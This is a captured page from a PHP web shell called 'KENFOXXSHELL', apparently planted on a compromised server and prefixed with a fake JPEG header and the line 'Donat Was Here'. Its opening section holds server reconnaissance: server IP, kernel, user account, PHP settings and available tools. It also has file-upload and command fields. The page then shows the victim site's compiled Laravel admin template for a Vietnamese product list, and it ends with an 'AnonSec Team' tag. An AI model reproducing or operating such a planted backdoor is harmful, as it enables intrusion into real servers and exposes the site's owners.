JFIFHHC     C  " 5????! ??? Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/public_html/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/public_html/storage/framework/views/91e3fdf23ac86f436c7cf1680d48ee3870c08d05.php
<?php $__env->startSection('content'); ?>



<?php $__env->startSection('controller','Product'); ?>



<?php $__env->startSection('action','List'); ?>
<!-- Content Header (Page header) -->
<script type="text/javascript">
  $(document).ready(function() {
    $("#chonhet").click(function(){
      var status=this.checked;
      $("input[name='chon']").each(function(){this.checked=status;})
    });
    $("#xoahet").click(function(){
      var listid="";
      $("input[name='chon']").each(function(){
        if (this.checked) listid = listid+","+this.value;
        })
      listid=listid.substr(1);   //alert(listid);
      if (listid=="") { alert("Bạn chưa chọn mục nào"); return false;}
      hoi= confirm("Bạn có chắc chắn muốn xóa?");



      if (hoi==true) document.location = homeUrl()+"/admin/product/"+listid+"/deleteList";



    });



  });



</script>
<script type="text/javascript">
    function changepos() {
        document.frm1.action = "admin/product/changepos";
        document.frm1.submit();
    }

</script>


<section class="content-header">



  <h1>



    <?php echo $__env->yieldContent('controller'); ?>



    <small><?php echo $__env->yieldContent('action'); ?></small>



  </h1>



  <ol class="breadcrumb">



    <li><a href="admin"><i class="fa fa-dashboard"></i> Home</a></li>



    <li><a href="javascript:"><?php echo $__env->yieldContent('controller'); ?></a></li>



    <li class="active"><?php echo $__env->yieldContent('action'); ?></li>



  </ol>



</section>



<!-- Main content -->


<form method="post" name="frm1" enctype="multipart/form-data">
  <input type="hidden" name="_token" value="<?php echo csrf_token(); ?>" />
<section class="content">



  <div class="row">



    <div class="col-xs-12">



      <div class="box">



        <?php echo $__env->make('admin.messages_error', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>



        <!--<div class="box-header">



          <h3 class="box-title">Data Table With Full Features</h3>



        </div>-->



        <div class="box-body">



          <table id="example1" class="table table-bordered table-striped"> 



            <thead>



              <tr>



                <th style="width: 20px;"><input type="checkbox" name="chonhet" class="minimal" id="chonhet" /></th>



                <th class="text-center with_dieuhuong">Stt</th>



                <th>Danh mục</th>



                <th>Tên sản phẩm</th>
             
                <th style="text-align:center;width: 12%;" ><a class="vitri" onclick="changepos()">Vị trí</a></th>
         
                



                <th class="text-center with_dieuhuong">Hoạt động</th>



                <th class="text-center with_dieuhuong">Sửa</th>



                <th class="text-center with_dieuhuong">Xóa</th>



              </tr>



            </thead>



            <tbody>



              <?php $__currentLoopData = $data; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $k=>$item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>



              <tr>



                <td><input type="checkbox" name="chon" id="chon" value="<?php echo e($item->id); ?>" class="chon" /></td>



                <td class="text-center with_dieuhuong"><?php echo e($k+1); ?></td>



                <td>

                <?php if(@$_GET['type']!='combo'){?>

                  <?php  $parent = DB::table('product_categories')->where('id', $item->cate_id)->first();



                  ?>



                  <?php if(!empty($parent)): ?>



                    <?php echo e($parent->name); ?>




                  <?php else: ?>



                    <?php echo e('None'); ?>




                  <?php endif; ?>

                <?php } else{ ?>

                	<?php $combo = DB::table("combos")->select()->where('id',$item->combo_id)->first();   ?>      



                    <?php if(!empty($combo)): ?>



                        <?php echo e($combo->name); ?>


    

                      <?php else: ?>

    

                        <?php echo e('None'); ?>


    

                      <?php endif; ?>

   

                

                <?php } ?>

                </td>



                <td>  
                    <?php echo e($item->name); ?> <br> Link sản phẩm: 
                    <a href="<?php echo e(asset( $item->alias.'.'.$item->id.'.html' )); ?>" target="_blank">
                       <?php echo e(asset( $item->alias.'.'.$item->id.'.html' )); ?>

                    </a>
                </td>

               
                <td style="text-align:center;" >
                    <input class="text-input medium-input" style="text-align:center; width:30% !important;" type="text" value="<?php echo $item->stt?>" name="order[<?php echo $item->id; ?>]" />
                    <input type="hidden"  value="<?php echo $item->id?>" name="idsy[<?php echo $item->id; ?>]" />
                </td>
            

                



                <td class="text-center with_dieuhuong">
                  <div class="form-group"> 
                    <?php if($item->status>0): ?>
                      <a href="admin/product/edit?id=<?php echo e($item->id); ?>&hienthi=<?php echo e(time()); ?>" class="btn btn-primary btn-xs"><i class="fa fa-eye"></i> Hiển thị</a>
                    <?php else: ?>
                      <a href="admin/product/edit?id=<?php echo e($item->id); ?>&hienthi=<?php echo e(time()); ?>" class="btn btn-danger btn-xs"><i class="fa fa-eye"></i> Hiển thị</a>
                    <?php endif; ?>
                  </div>
                  <div class="form-group"> 
                    <?php if($item->hethang>0): ?>
                      <a href="admin/product/edit?id=<?php echo e($item->id); ?>&hethang=<?php echo e(time()); ?>" class="btn btn-primary btn-xs"><i class="fa fa-eye"></i> Hết hàng</a>
                    <?php else: ?>
                      <a href="admin/product/edit?id=<?php echo e($item->id); ?>&hethang=<?php echo e(time()); ?>" class="btn btn-danger btn-xs"><i class="fa fa-eye"></i> Hết hàng</a>
                    <?php endif; ?>
                  </div>  
                
                  <div class="form-group"> 
                    <?php if($item->spbc > 0): ?>
                      <a href="admin/product/noibat/<?php echo e($item->id); ?>" class="btn btn-primary btn-xs"><i class="fa fa-eye"></i> Nổi bật</a>
                    <?php else: ?>
                      <a href="admin/product/noibat/<?php echo e($item->id); ?>" class="btn btn-danger btn-xs"><i class="fa fa-eye"></i> Nổi bật</a>
                    <?php endif; ?>
                  </div>
                
                </td>



                <td class="text-center with_dieuhuong">



                  <i class="fa fa-pencil fa-fw"></i><a href="admin/product/edit?id=<?php echo e($item->id); ?><?php if(@$_GET['type']=='combo' || @$_GET['type']=='sanpham'){echo'&type=';echo @$_GET['type'];}?>">Edit</a>



                </td>



                <td class="text-center">



                  <i class="fa fa-trash-o fa-fw"></i><a onClick="if(!confirm('Xác nhận xóa')) return false;" href="admin/product/<?php echo e($item->id); ?>/delete<?php if(@$_GET['type']=='combo' || @$_GET['type']=='sanpham'){echo'?type=';echo @$_GET['type'];}?>">Delete</a>



                </td>



              </tr>



              <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>



            </tbody>



          </table>



        </div><!-- /.box-body -->



        <div class="box-footer col-md-12">



          <div class="row">



            <div class="col-md-6">



                



              <input type="button"  onclick="javascript:window.location='admin/product/add<?php if(@$_GET['type']=='combo' || @$_GET['type']=='sanpham'){echo'?type=';echo @$_GET['type'];}?>'" value="Thêm" class="btn btn-primary" />



              <button type="button" id="xoahet" class="btn btn-success">Xóa</button>



              <input type="button" value="Thoát" onclick="javascript:window.location='admin'" class="btn btn-danger" />







            </div>



          </div>



        </div>



      </div><!-- /.box -->



    </div><!-- /.col -->



  </div><!-- /.row -->



</section><!-- /.content -->
</form>


<?php $__env->stopSection(); ?>




<?php echo $__env->make('admin.master', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Anon7 - 2022
AnonSec Team